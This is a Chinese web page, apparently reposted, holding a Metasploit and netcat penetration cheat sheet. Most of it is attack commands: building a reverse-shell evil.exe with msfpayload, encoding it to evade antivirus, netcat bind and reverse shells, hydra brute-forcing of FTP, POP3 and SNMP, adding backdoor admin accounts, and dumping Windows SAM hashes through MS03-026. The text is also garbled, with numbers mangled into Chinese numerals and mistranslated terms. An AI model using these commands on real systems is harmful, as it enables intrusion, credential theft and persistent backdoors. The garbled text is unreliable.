|
|
|
联系客服020-83701501

metasploit常用渗透命令

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
metasploit经常使用渗入号令

svn update 晋级
./msf站点 Web接口127.0.0.1:五5五5五。.
./msfconsole 字符下的Console。
help 急救
show <option> 浮现选项
search <name> 搜寻名字
use <exploit name> 把持缝隙
show options 浮现选项
set <OPTION NAME> <option> 设置选项
show payloads 浮现陈列
set PAYLOAD <payload name> 设置陈列
show options 浮现选项
set <OPTION NAME> <option> 设置选项
show targets 浮现目的(os版本)
set TARGET <target number> 设置目的版本
exploit 开始缝隙进击
sessions -l 列出会话
sessions -i <ID> 决议会话
sessions -k <ID> 完毕会话
<ctrl> z 把会话放到后盾
<ctrl> c 完毕会话
jobs 列出缝隙运转工作
jobs -K 完毕1个缝隙运转工作
show auxiliary 浮现帮忙模块
use <auxiliary name> 把持帮忙模块
set <OPTION NAME> <option> 设置选项
run 运转模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql可否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
Target behind firewall: reverse shell反向
Meterpreter承接不懂dos的可能用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
踊跃化进击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口进击流程:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
做木马后门等:
./msfpayload <payload> <variable=value> <output type>
S su妹妹ary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=四4四4 X > evil.exe
编码处理即是做免杀:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=四4四4 R | ./msfencode -b ‘x00’ -l
./msfpayload linux_ia32_bind LPORT=四4四4 R | ./msfencode -b ‘x00’ -e PexFnstenvMor -t c

入侵后在windows下减少办理员用户:
hostname 查看主机名
net users 查看用户
net user 用户暗码 /add 减少用户
net localgroup 查看工作组
net localgroup administrators 查看办理员组
net localgroup administrators x /add 将用户到场办理员组

TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载

netcat瑞士军刀
attacker: 10.1.1.1
target: 10.1.1.2
nc -v -z 10.1.1.2 1-102四 端口扫描
target: nc -lvp 四4四4 谈天设置(处事)
attacker: nc -v 10.1.1.2 四4四4 谈天设置(客户)
target: nc -lvp 四4四4 > output.txt传输文件(接受)
attacker: nc -v 10.1.1.2 四4四4 < test.txt传输文件(发送)
target: nc -lvp 四4四4 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 四4四4
target:nc -lvp 四4四4 Reverse shell。
attacker:nc -v 10.1.1.2 四4四4 -e /bin/bash

暗码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l浮现个数(30多万个)
暴力:
hydra -l ftp -P words -v targetIP ftp 进击ftp。
hydra -l muts -P words -v targetIP pop3 进击pop3
hydra -P words -v targetIP snmp 进击snmp
进击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r?www.target.com?–accept=pdf 下载pdf文档
wyd.pl -o output.txt?www.target.com/
cat output.txt | more
SAM文件(windows下的暗码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:windowssystem32
meterpreter > execute -f cmd -c
meterpreter > interact x
C:WINDOWSsystem32> pwdump 127.0.0.1

本文由Internet安然攻防研讨室(www.91ri.org)信息安然小组收集整理。

数安新闻+更多

证书相关+更多